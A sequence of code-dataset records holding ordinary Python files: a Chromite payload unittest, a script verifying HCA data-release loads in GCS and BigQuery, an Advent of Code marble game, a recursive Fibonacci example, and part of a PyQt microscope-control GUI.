key, val)\n\n def AddPayloadSignature(self, **kwargs):\n self._AddSignatureToProto(self._payload_signatures, **kwargs)\n blob = self._payload_signatures.SerializeToString()\n self._manifest.signatures_offset = 1234\n self._manifest.signatures_size = len(blob)\n self._blobs[self._manifest.signatures_offset] = blob\n\n def AddMetadataSignature(self, **kwargs):\n self._AddSignatureToProto(self._metadata_signatures, **kwargs)\n if self._header.metadata_signature_len:\n del self._blobs[-self._header.metadata_signature_len]\n blob = self._metadata_signatures.SerializeToString()\n self._header.metadata_signature_len = len(blob)\n self._blobs[-len(blob)] = blob\n\n\nclass PayloadCommandTest(cros_test_lib.MockOutputTestCase):\n \"\"\"Test class for our PayloadCommand class.\"\"\"\n\n def testDisplayValue(self):\n \"\"\"Verify that DisplayValue prints what we expect.\"\"\"\n with self.OutputCapturer() as output:\n cros_payload.DisplayValue('key', 'value')\n stdout = output.GetStdout()\n self.assertEquals(stdout, 'key: value\\n')\n\n def testRun(self):\n \"\"\"Verify that Run parses and displays the payload like we expect.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testListOpsOnVersion1(self):\n \"\"\"Verify that the --list_ops option gives the correct output.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(list_ops=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\n\nInstall operations:\n 0: REPLACE_BZ\n Data offset: 1\n Data length: 1\n Destination: 2 extents (3 blocks)\n (1,1) (2,2)\nKernel install operations:\n 0: SOURCE_COPY\n Source: 1 extent (1 block)\n (1,1)\n Destination: 20 extents (190 blocks)\n (0,0) (1,1) (2,2) (3,3) (4,4) (5,5) (6,6) (7,7) (8,8) (9,9) (10,10)\n (11,11) (12,12) (13,13) (14,14) (15,15) (16,16) (17,17) (18,18) (19,19)\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testListOpsOnVersion2(self):\n \"\"\"Verify that the --list_ops option gives the correct output.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(list_ops=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 2\nManifest length: 222\nNumber of partitions: 2\n Number of \"rootfs\" ops: 1\n Number of \"kernel\" ops: 1\nBlock size: 4096\nMinor version: 4\n\nrootfs install operations:\n 0: REPLACE_BZ\n Data offset: 1\n Data length: 1\n Destination: 2 extents (3 blocks)\n (1,1) (2,2)\nkernel install operations:\n 0: SOURCE_COPY\n Source: 1 extent (1 block)\n (1,1)\n Destination: 20 extents (190 blocks)\n (0,0) (1,1) (2,2) (3,3) (4,4) (5,5) (6,6) (7,7) (8,8) (9,9) (10,10)\n (11,11) (12,12) (13,13) (14,14) (15,15) (16,16) (17,17) (18,18) (19,19)\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testStatsOnVersion1(self):\n \"\"\"Verify that the --stats option works correctly.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(stats=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\nBlocks read: 11\nBlocks written: 193\nSeeks when writing: 18\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testStatsOnVersion2(self):\n \"\"\"Verify that the --stats option works correctly on version 2.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(stats=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 2\nManifest length: 222\nNumber of partitions: 2\n Number of \"rootfs\" ops: 1\n Number of \"kernel\" ops: 1\nBlock size: 4096\nMinor version: 4\nBlocks read: 11\nBlocks written: 193\nSeeks when writing: 18\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testEmptySignatures(self):\n \"\"\"Verify that the --signatures option works with unsigned payloads.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(\n FakeOption(action='show', signatures=True))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\nNo metadata signatures stored in the payload\nNo payload signatures stored in the payload\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n\n def testSignatures(self):\n \"\"\"Verify that the --signatures option shows the present signatures.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(\n FakeOption(action='show', signatures=True))\n payload = FakePayload(cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO)\n payload.AddPayloadSignature(version=1,\n data='12345678abcdefgh\\x00\\x01\\x02\\x03')\n payload.AddPayloadSignature(data='I am a signature so access is yes.')\n payload.AddMetadataSignature(data='\\x00\\x0a\\x0c')\n self.PatchObject(update_payload, 'Payload', return_value=payload)\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 2\nManifest length: 222\nNumber of partitions: 2\n Number of \"rootfs\" ops: 1\n Number of \"kernel\" ops: 1\nBlock size: 4096\nMinor version: 4\nMetadata signatures blob: file_offset=246 (7 bytes)\nMetadata signatures: (1 entries)\n version=None, hex_data: (3 bytes)\n 00 0a 0c | ...\nPayload signatures blob: blob_offset=1234 (64 bytes)\nPayload signatures: (2 entries)\n version=1, hex_data: (20 bytes)\n 31 32 33 34 35 36 37 38 61 62 63 64 65 66 67 68 | 12345678abcdefgh\n 00 01 02 03 | ....\n version=None, hex_data: (34 bytes)\n 49 20 61 6d 20 61 20 73 69 67 6e 61 74 75 72 65 | I am a signature\n 20 73 6f 20 61 63 63 65 73 73 20 69 73 20 79 65 | so access is ye\n 73 2e | s.\n\"\"\"\n self.assertEquals(stdout, expected_out)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/chromite/cli/cros/cros_payload_unittest.py","file_name":"cros_payload_unittest.py","file_ext":"py","file_size_in_byte":12783,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"14545727059","text":"\"\"\"\nGiven a file containing a list of constituent staging dirs for a DCP release (aka a manifest),\nverify that data has been loaded from each of them to the target DCP dataset and the count of loaded files\nmatches the # in the staging area.\n\nFiles are determined to be loaded if they exist at the desired target path and crc as defined in the staging\nareas descriptors. It's possible that an expected file was loaded by another staging dir (i.e,. they both\ncontain the same file). While this is discouraged, it's technically possible and we need to accommodate that.\nSo, we check if the target path was loaded, disregarding the source staging dir.\n\nAdditionally, this will check that metadata was loaded properly (including links) by pull the entity_id, version and\ncontent from the files in GS and checking that the expected row is present in the given dataset. If a newer version\nis present in the repo than is staged, we consider that valid.\n\nExample invocation:\npython verify_release_manifest.py -f testing.csv -g fake-gs-project -b fake-bq-project -d fake-dataset\n\"\"\"\nimport argparse\nimport json\nimport logging\nimport sys\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom collections import defaultdict\nfrom functools import partial\nfrom multiprocessing import Pool\nfrom typing import Tuple\nfrom urllib.parse import urlparse\nfrom dateutil import parser\n\nfrom google.cloud import bigquery, storage\nfrom google.cloud.storage.client import Client\nfrom dagster_utils.contrib.google import get_credentials\n\nfrom hca_orchestration.solids.load_hca.data_files.load_data_metadata_files import FileMetadataTypes\nfrom hca_orchestration.solids.load_hca.non_file_metadata.load_non_file_metadata import NonFileMetadataTypes\nfrom hca_orchestration.support.dates import parse_version_to_datetime\n\nlogging.basicConfig(level=logging.INFO, format='%(message)s')\n\n\n@dataclass(frozen=True)\nclass PathWithCrc:\n path: str\n crc32c: str\n\n\n@dataclass(frozen=True)\nclass StagingAreaVerificationResult:\n has_metadata_errors: bool\n has_file_errors: bool\n\n def has_errors(self) -> bool:\n return self.has_metadata_errors or self.has_file_errors\n\n\ndef get_staging_area_file_descriptors(storage_client: Client, staging_areas: set[str]) -> dict[str, set[PathWithCrc]]:\n \"\"\"\n Given a set of GS staging areas, return the downloaded descriptors present in each area\n \"\"\"\n\n expected: dict[str, set[PathWithCrc]] = defaultdict(set[PathWithCrc])\n for staging_area in staging_areas:\n url = urlparse(staging_area)\n\n for file_type in FileMetadataTypes:\n prefix = f\"{url.path.lstrip('/')}/descriptors/{file_type.value}\"\n blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))\n for blob in blobs:\n parsed = json.loads(blob.download_as_text())\n path_with_crc = PathWithCrc(target_path_from_descriptor(parsed), parsed[\"crc32c\"])\n expected[staging_area].add(path_with_crc)\n\n return expected\n\n\ndef target_path_from_descriptor(descriptor: dict[str, str]) -> str:\n return f\"/v1/{descriptor['file_id']}/{descriptor['crc32c']}/{descriptor['file_name']}\"\n\n\ndef find_files_in_load_history(bq_project: str, dataset: str,\n areas: dict[str, set[PathWithCrc]]) -> dict[str, set[PathWithCrc]]:\n client = bigquery.Client(project=bq_project)\n loaded_paths = {}\n\n for area, paths_with_crc in areas.items():\n logging.debug(f\"\\tPulling loaded files for area {area}...\")\n target_paths = [path_with_crc.path for path_with_crc in paths_with_crc]\n query = f\"\"\"\n SELECT target_path, checksum_crc32c\n FROM `datarepo_{dataset}.datarepo_load_history` dlh\n WHERE state = 'succeeded'\n AND target_path IN UNNEST(@paths)\n \"\"\"\n\n job_config = bigquery.QueryJobConfig(\n query_parameters=[\n bigquery.ArrayQueryParameter(\"paths\", \"STRING\", target_paths),\n ]\n )\n query_job = client.query(query, job_config=job_config)\n loaded_paths[area] = {PathWithCrc(row[\"target_path\"], row[\"checksum_crc32c\"]) for row in\n query_job}\n\n return loaded_paths\n\n\ndef parse_manifest_file(manifest_file: str) -> list[str]:\n with open(manifest_file) as manifest:\n # some of the staging areas submitted via the form need slight cleanup\n return [area.rstrip('\\n/').strip() for area in manifest]\n\n\ndef process_staging_area(area: str, gs_project: str, bq_project: str, dataset: str,\n release_cutoff: datetime) -> StagingAreaVerificationResult:\n logging.info(f\"Processing staging area = {area}\")\n\n creds = get_credentials()\n storage_client = storage.Client(project=gs_project, credentials=creds)\n expected_loaded_paths = get_staging_area_file_descriptors(storage_client, {area})\n loaded_paths_by_staging_area = find_files_in_load_history(bq_project, dataset, expected_loaded_paths)\n\n has_file_error = False\n for area, paths_with_crc in expected_loaded_paths.items():\n load_paths_for_staging_area = loaded_paths_by_staging_area[area]\n diff = paths_with_crc - load_paths_for_staging_area\n loaded = len(load_paths_for_staging_area)\n staged = len(paths_with_crc)\n\n if diff:\n logging.warning(\n f\"❌ area = {area} - (data files) Mismatched loaded paths; expected files loaded = {staged}, actual loaded = {loaded}\"\n )\n logging.debug(diff)\n has_file_error = True\n else:\n logging.info(\n f\"✅ area = {area} - (data files) expected files loaded = {staged}, actual loaded = {loaded}\"\n )\n\n has_metadata_error = verify_metadata(area, bq_project, dataset, release_cutoff)\n return StagingAreaVerificationResult(has_metadata_error, has_file_error)\n\n\ndef inspect_entities_at_path(storage_client: Client, bq_client: bigquery.Client, bq_project: str,\n bq_dataset: str, staging_area: str, prefix: str, entity_type: str,\n release_cutoff: datetime) -> bool:\n metadata_entities: dict[str, Tuple[str, str]] = {}\n\n url = urlparse(staging_area)\n if prefix:\n prefix = f\"{url.path.lstrip('/')}/{prefix}/{entity_type}\"\n else:\n prefix = f\"{url.path.lstrip('/')}/{entity_type}\"\n\n blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))\n\n for blob in blobs:\n content = blob.download_as_text()\n file_name = blob.name.split('/')[-1]\n entity_id = file_name.split('_')[0]\n version = file_name.split('_')[1].replace('.json', '')\n\n # files may be staged after we import, guard against those versions being present\n version_timestamp = parse_version_to_datetime(version)\n if version_timestamp > release_cutoff:\n logging.info(f\"Ignoring file {file_name} staged after cutoff\")\n continue\n\n # multiple versions may be staged, the latest one should win\n if entity_id in metadata_entities:\n existing_version, _ = metadata_entities[entity_id]\n if existing_version >= version:\n continue\n\n metadata_entities[entity_id] = (version, content)\n\n if len(metadata_entities) == 0:\n if entity_type == 'links':\n logging.debug(f\"area = {staging_area} no links data found\")\n return False\n\n logging.debug(f\"️area = {staging_area} No metadata for {entity_type} expected, skipping\")\n return False\n\n logging.debug(f\"Querying for metadata entities of type {entity_type} [area={staging_area}]\")\n entity_ids = metadata_entities.keys()\n query = f\"\"\"\n SELECT {entity_type}_id, content, version FROM `{bq_project}.datarepo_{bq_dataset}.{entity_type}`\n WHERE {entity_type}_id IN UNNEST(@entity_ids)\n \"\"\"\n job_config = bigquery.QueryJobConfig(\n query_parameters=[\n bigquery.ArrayQueryParameter(\"entity_ids\", \"STRING\", entity_ids),\n ]\n )\n query_job = bq_client.query(query, job_config=job_config)\n rows = {row[f'{entity_type}_id']: (row['version'], row['content']) for row in query_job.result()}\n\n has_error = False\n for key, (version, content) in metadata_entities.items():\n if key not in rows.keys():\n logging.info(f\"❌ area = {staging_area} {entity_type} ID {key} not in table\")\n return True\n\n row = rows[key]\n parsed_version = parser.parse(version)\n if parsed_version < row[0]:\n # old version staged but a newer version was present, ignore\n logging.debug(\n f\"Newer version of entity present in repo, ignoring. [area={staging_area}, entity_type={entity_type}, id={key}]\"\n )\n continue\n\n if not parser.parse(version) == row[0]:\n has_error = True\n logging.info(f\"❌ area = {staging_area} {entity_type} ID {key} version is incorrect\")\n if not json.loads(content) == json.loads(row[1]):\n has_error = True\n logging.info(f\"❌ area = {staging_area} {entity_type} ID {key} content is incorrect\")\n\n logging.debug(\n f\"✅ area = {staging_area} - (metadata) all {entity_type} entities found ({len(metadata_entities.keys())} entities)\")\n return has_error\n\n\ndef verify_metadata(staging_area: str, bq_project: str, bq_dataset: str, release_cutoff: datetime) -> bool:\n creds = get_credentials()\n storage_client = storage.Client(project=\"broad-dsp-monster-hca-prod\", credentials=creds)\n client = bigquery.Client(project=bq_project)\n\n logging.debug(f\"Verifying metadata for {staging_area}\")\n\n links_errors = inspect_entities_at_path(\n storage_client,\n client,\n bq_project,\n bq_dataset,\n staging_area,\n \"\",\n \"links\",\n release_cutoff\n )\n\n non_file_metadata_errors = [\n inspect_entities_at_path(\n storage_client,\n client,\n bq_project,\n bq_dataset,\n staging_area,\n \"metadata\",\n non_file_metadata_type.value,\n release_cutoff\n ) for non_file_metadata_type in\n NonFileMetadataTypes]\n file_metadata_errors = [\n inspect_entities_at_path(\n storage_client,\n client, bq_project,\n bq_dataset,\n staging_area,\n \"metadata\",\n file_metadata_type.value,\n release_cutoff\n ) for file_metadata_type in FileMetadataTypes]\n\n return any(file_metadata_errors) or any(non_file_metadata_errors) or links_errors\n\n\ndef verify(manifest_file: str, gs_project: str, bq_project: str,\n dataset: str, pool_size: int, release_cutoff: str) -> int:\n staging_areas = parse_manifest_file(manifest_file)\n parsed_cutoff = datetime.fromisoformat(release_cutoff)\n\n logging.info(\"Parsing manifest...\")\n logging.info(f\"Release cutoff = {release_cutoff}\")\n logging.info(f\"{len(staging_areas)} staging areas in manifest.\")\n logging.info(f\"Inspecting staging areas (pool_size = {pool_size})...\")\n\n # we multiprocess because this takes quite awhile for > 10 projects, which is common for our releases\n frozen = partial(\n process_staging_area,\n gs_project=gs_project,\n bq_project=bq_project,\n dataset=dataset,\n release_cutoff=parsed_cutoff)\n\n if pool_size > 0:\n with Pool(pool_size) as p:\n results = p.map(frozen, staging_areas)\n else:\n results = [frozen(area) for area in staging_areas]\n\n logging.info('-' * 80)\n if any(map(lambda x: x.has_errors(), results)):\n logging.error(f\"❌ Manifest {manifest_file} had errors\")\n return 1\n else:\n logging.info(f\"✅ Manifest {manifest_file} had no errors\")\n\n return 0\n\n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\"-f\", \"--manifest-file\", required=True)\n argparser.add_argument(\"-g\", \"--gs-project\", required=True)\n argparser.add_argument(\"-b\", \"--bq-project\", required=True)\n argparser.add_argument(\"-d\", \"--dataset\", required=True)\n argparser.add_argument(\"-p\", \"--pool-size\", type=int, default=4)\n argparser.add_argument(\"-r\", \"--release-cutoff\", required=True)\n args = argparser.parse_args()\n\n exit_code = verify(\n args.manifest_file,\n args.gs_project,\n args.bq_project,\n args.dataset,\n args.pool_size,\n args.release_cutoff)\n\n sys.exit(exit_code)\n","repo_name":"DataBiosphere/hca-ingest","sub_path":"orchestration/hca_manage/verify_release_manifest.py","file_name":"verify_release_manifest.py","file_ext":"py","file_size_in_byte":12585,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"1260513764","text":"import re\n\n\nclass Marble:\n def __init__(self, number):\n self.left = self\n self.right = self\n self.number = number\n\n def get_left(self, n):\n marble = self\n for i in range(n):\n marble = marble.left\n return marble\n\n def get_right(self, n):\n marble = self\n for i in range(n):\n marble = marble.right\n return marble\n\n def insert_right(self, marble, n):\n \"\"\"\n Inserts a marble between the marble n and the marble n+1 to the right\n :param marble:\n :param n:\n :return:\n \"\"\"\n marble.left = self.get_right(n)\n marble.right = self.get_right(n+1)\n self.get_right(n+1).left = marble\n self.get_right(n).right = marble\n\n def remove_left(self, n):\n marble = self.get_left(n)\n l = self.get_left(n+1)\n r = self.get_left(n-1)\n l.right = r\n r.left = l\n return marble\n\n def __repr__(self):\n return \"Marble {}. Left: {}. Right: {}\".format(self.number, self.left.number, self.right.number)\n\n\nclass Game:\n def __init__(self, num_players, last_marble):\n self.last_marble = last_marble\n self.players_points = [0]*num_players\n self.current_marble: \"Marble\" = Marble(0)\n self.__current_player = -1\n self.__current_number = 0\n\n def next_marble(self):\n self.__current_number += 1\n return self.__current_number\n\n def next_player(self):\n self.__current_player += 1\n self.__current_player = self.__current_player % len(self.players_points)\n return self.__current_player\n\n def _play_round(self):\n player = self.next_player()\n marble = Marble(self.next_marble())\n if marble.number % 23 != 0:\n self.current_marble.insert_right(marble,1)\n self.current_marble = marble\n # print(\"[{}]. {}\".format(player+1, self.current_marble))\n else:\n self.players_points[player] += marble.number\n self.players_points[player] += self.current_marble.remove_left(7).number\n self.current_marble: \"Marble\" = self.current_marble.get_left(6)\n\n def play(self):\n for i in range(self.last_marble):\n self._play_round()\n bestscore = max(self.players_points)\n print(\"Winner: {} with a score of {}\".format(self.players_points.index(bestscore) + 1, bestscore))\n return bestscore\n\n\ndef part1():\n game = Game(9, 25)\n assert game.play() == 32\n game = Game(10, 1618)\n assert game.play() == 8317\n game = Game(13, 7999)\n assert game.play() == 146373\n with open(\"../input/2018/day9.txt\", \"r\") as file:\n games = file.readlines()\n for line in games:\n values = re.findall(r\"(\\d+)\\splayers.*worth\\s(\\d+).*\", line)[0]\n game = Game(int(values[0]), int(values[1]))\n game.play()\n\n\ndef part2():\n game = Game(403, 7192000)\n game.play()\n\n\npart1()\npart2()\n","repo_name":"seeba8/advent_of_code_2018","sub_path":"src/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10430290595","text":"def fibonacci(n):\n assert n>=0 and int(n) == n,'fibonacci number cannot be negative number or non-integer number'\n if n in [0,1]:\n return n\n else:\n return fibonacci(n-1)+fibonacci(n-2)\n\nn= int(input('enter n - '))\nprint(f\"the {n}th fibonacci number is \"+str(fibonacci(n)))\nfor i in range(n+1):\n print(fibonacci(i))","repo_name":"Nryreddy/Recursion","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9582843835","text":"\"\"\"Main GUI display.\n\nThis module contains the `GUI` and `MyTableWidget` class' responsible for\ncreating the main user interface with the FAR-IR Horizontal Microscope.\n\"\"\"\n\n\nfrom flir_camera_control import get_image\nfrom PyQt5.QtGui import QPixmap, QFont, QIcon\nfrom PyQt5.QtCore import QRectF, QTimer, Qt\nfrom PyQt5.QtWidgets import (\n QButtonGroup, QComboBox, QDockWidget, QGridLayout, QLabel, QLineEdit,\n QMainWindow, QPushButton, QRadioButton, QScrollBar, QTabWidget,\n QTextBrowser, QVBoxLayout, QWidget, QFileDialog\n)\nfrom typing import Any\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyqtgraph as pg\nimport pyqtgraph.ptime as ptime\n\n\nclass GUI(QMainWindow):\n \"\"\"Main GUI window.\n\n The `GUI` class creates the main gui window which allows users to monitor\n and control the main functionality of the microscope.\n\n Parameters\n ----------\n data : dict\n Dictionary of raw configuration variable data.\n macros : dict\n Dictionary of macro variables (planar version of the `data` attribute).\n savedPos : dict\n Dictionary of saved positions.\n\n Attributes\n ----------\n data : dict\n Dictionary containing initialization data.\n macros : dict\n Dictionary containing macro variables.\n tab : MyTableWidget object\n The tabular display located on the main GUI window.\n xSN, ySN, zSN : QPushButton\n Negative incrment button for the sample's x, y, and z dimensions.\n xSP, ySP, zSP : QPushButton\n Positive incrment button for the sample's x, y, and z dimensions.\n xSStep, ySStep, zSStep : QLineEdit\n Step size line edit for the sample's x, y, and z dimensions.\n xSAbsPos, ySAbsPos, zSAbsPos : QLineEdit\n Absolute position line edit for the sample's x, y, and z dimensions.\n xSMove, ySMove, zSMove : QPushButton\n Move to absolute position button for the sample's x, y, and z\n dimensions.\n xSCn, ySCn, zSCn : QPushButton\n Continuous negative motion buttonfor the sample's x, y, and z\n dimensions.\n xSStop, ySStop, zSStop : QPushButton\n Stop continuous motion button for the sample's x, y, and z dimensions.\n xSCp, ySCp, zSCp : QPushButton\n Continuous positive motion buttonfor the sample's x, y, and z\n dimensions.\n xSSn, ySSn, zSSn : QLineEdit\n Negative soft limit label for the sample's x, y, and z dimensions.\n xSSp, ySSp, zSSp : QLineEdit\n Positive soft limit label for the sample's x, y, and z dimensions.\n xSHn, ySHn, zSHn : QLineEdit\n Negative hard limit label for the sample's x, y, and z dimensions.\n xSHn, ySHn, zSHn : QLineEdit\n Positive hard limit label for the sample's x, y, and z dimensions.\n xStepS, yStepS, zStepS : QLabel\n STEPS label for the sample's x, y, and z dimensions.\n xIdleS, yIdleS, zIdleS : QLabel\n Motor status label for the sample's x, y, and z dimensions.\n xON, yON, zON : QPushButton\n Negative incrment button for the objective's x, y, and z dimensions.\n xOP, yOP, zOP : QPushButton\n Positive incrment button for the objective's x, y, and z dimensions.\n xOStep, yOStep, zOStep : QLineEdit\n Step size line edit for the objective's x, y, and z dimensions.\n xOAbsPos, yOAbsPos, zOAbsPos : QLineEdit\n Absolute position line edit for the objective's x, y, and z dimensions.\n xOMove, yOMove, zOMove : QPushButton\n Move to absolute position button for the objective's x, y, and z\n dimensions.\n xOCn, yOCn, zOCn : QPushButton\n Continuous negative motion buttonfor the objective's x, y, and z\n dimensions.\n xOStop, yOStop, zOStop : QPushButton\n Stop continuous motion button for the objective's x, y, and z\n dimensions.\n xOCp, yOCp, zOCp : QPushButton\n Continuous positive motion buttonfor the objective's x, y, and z\n dimensions.\n xOSn, yOSn, zOSn : QLineEdit\n Negative soft limit label for the objective's x, y, and z dimensions.\n xOSp, yOSp, zOSp : QLineEdit\n Positive soft limit label for the objective's x, y, and z dimensions.\n xOHn, yOHn, zOHn : QLineEdit\n Negative hard limit label for the objective's x, y, and z dimensions.\n xOHn, yOHn, zOHn : QLineEdit\n Positive hard limit label for the objective's x, y, and z dimensions.\n xStepO, yStepO, zStepO : QLabel\n STEPS label for the objective's x, y, and z dimensions.\n xIdleO, yIdleO, zIdleO : QLabel\n Motor status label for the objective's x, y, and z dimensions.\n textWindow : QTextBrowser\n Text browser to display Terminal output.\n savePos : QPushButton\n Save current position push button.\n loadPos : QPushButton\n Load selected position push button.\n deletePos : QPushButton\n Delete selected position push button.\n clearPos : QPushButton\n Clear all saved positions push button.\n posSelect : QComboBox\n Combo box to select a saved position.\n posLabel : QLineEdit\n Text box to insert the label for a position to save.\n loadConfig : QPushButton\n Load a new configuration button.\n saveConfig : QPushButton\n Save current configuration button.\n positionUnits : QPushButton\n Control to shange the current position between steps and microns.\n\n Methods\n -------\n diagram_window()\n Return the diagram window.\n tabular_window()\n Return the table window.\n sample_window()\n Return the sample window.\n objective_window()\n Return the objective window.\n base_window()\n Return the base window.\n \"\"\"\n\n def __init__(self, data: dict, macros: dict, savedPos: dict) -> None:\n \"\"\"Initialize the GUI.\n \n Notes\n -----\n This method initializes the user interface by instantiating important\n attributes, configuring the main window, and calling helper functions\n to create individual windows.\n \"\"\"\n\n super().__init__()\n\n self.data = data\n self.macros = macros\n self.savedPos = savedPos\n\n # Set MicroGUI logo.\n self.setWindowIcon(QIcon(\"figures/MicroGUI_logo.png\"))\n\n # Define main GUI window.\n self.setWindowTitle(\"Horizontal Microscope Control\")\n self.setFixedWidth(1500)\n self.setFixedHeight(750)\n\n # Add sub-windows to main window layout.\n self.layout = QGridLayout()\n self.layout.addWidget(self.diagram_window(), 0, 0, 2, 5)\n self.layout.addWidget(CameraWindow(), 0, 5, 2, 5)\n self.layout.addWidget(self.tabular_window(), 0, 10, 2, 5)\n self.layout.addWidget(self.sample_window(), 2, 0, 1, 15)\n self.layout.addWidget(self.objective_window(), 3, 0, 1, 15)\n self.layout.addWidget(self.base_window(), 4, 0, 3, 15)\n\n # Set main window layout.\n self.centralWidget = QWidget(self)\n self.setCentralWidget(self.centralWidget)\n self.centralWidget.setLayout(self.layout)\n\n self.show()\n\n def diagram_window(self) -> QLabel:\n \"\"\"Return the diagram window.\n\n This method returns a label with the diagram display to allow users to\n understand motor motion and button correspondance.\n\n Returns\n -------\n QLabel\n Window representing the diagram display.\n \"\"\"\n\n window = QLabel()\n image = QPixmap(\"figures/diagram.jpg\")\n image = image.scaled(350, 350, Qt.KeepAspectRatio)\n window.setPixmap(QPixmap(image))\n\n return window\n\n def tabular_window(self) -> QWidget:\n \"\"\"Return the table window.\n\n This method returns the tab window for the gui configuration controls.\n\n Returns\n -------\n MyTableWidget(QWidget)\n Object representing the tabular widget.\n \"\"\"\n\n self.tab = MyTableWidget(self)\n return self.tab\n\n def sample_window(self) -> QWidget:\n \"\"\"Return the sample window.\n\n This method returns the controls and motor status indicators for the\n sample stage.\n\n Returns\n -------\n QWidget\n Window representing the sample interactive widgets.\n \"\"\"\n\n window = QWidget()\n layout = QGridLayout()\n\n sampleLab = QLabel(\"Sample Stage\")\n sampleLab.setFont(QFont(\"Times\", 9))\n layout.addWidget(sampleLab, 0, 0, 1, 12)\n\n # Define widget style sheets.\n button_style_grey = \"background-color: lightgrey\"\n button_style_red = \"background-color: red\"\n label_style_grey = \"background-color: lightgrey; border: 1px solid black;\"\n\n # Set column labels.\n layout.addWidget(QLabel(\"Axis\"), 1, 0, 1, 1)\n layout.addWidget(QLabel(\"Increment Position\"), 1, 1, 1, 2)\n layout.addWidget(QLabel(\"Step Size\"), 1, 3, 1, 1)\n layout.addWidget(QLabel(\"Absolute Position\"), 1, 4, 1, 1)\n layout.addWidget(QLabel(\"Continual Motion\"), 1, 6, 1, 3)\n layout.addWidget(QLabel(\"Soft Limits\"), 1, 9, 1, 2)\n layout.addWidget(QLabel(\"Hard Limits\"), 1, 11, 1, 2)\n layout.addWidget(QLabel(\"Current Position\"), 1, 13, 1, 1)\n layout.addWidget(QLabel(\"Motor Status\"), 1, 14, 1, 1)\n\n # ---------------------------------------------------------------------\n # X Sample Axis\n # ---------------------------------------------------------------------\n\n # Create interactive widgets.\n self.xSN = QPushButton(\"In\")\n self.xSP = QPushButton(\"Out\")\n self.xSStep = QLineEdit(\"0\")\n self.xSAbsPos = QLineEdit(\"0\")\n self.xSMove = QPushButton(\"MOVE\")\n self.xSCn = QPushButton(\"In\")\n self.xSStop = QPushButton(\"STOP\")\n self.xSCp = QPushButton(\"Out\")\n self.xSSn = QLabel(\"In\")\n self.xSSp = QLabel(\"Out\")\n self.xSHn = QLabel(\"In\")\n self.xSHp = QLabel(\"Out\")\n self.xIdleS = QLabel(\"IDLE\")\n self.xStepS = QLabel(\"STEPS\")\n\n # Set label alignment.\n self.xIdleS.setAlignment(Qt.AlignCenter)\n self.xStepS.setAlignment(Qt.AlignCenter)\n\n # Style interactive widgets.\n self.xSN.setStyleSheet(button_style_grey)\n self.xSP.setStyleSheet(button_style_grey)\n self.xSMove.setStyleSheet(button_style_grey)\n self.xSCn.setStyleSheet(button_style_grey)\n self.xSStop.setStyleSheet(button_style_red)\n self.xSCp.setStyleSheet(button_style_grey)\n self.xSSn.setStyleSheet(label_style_grey)\n 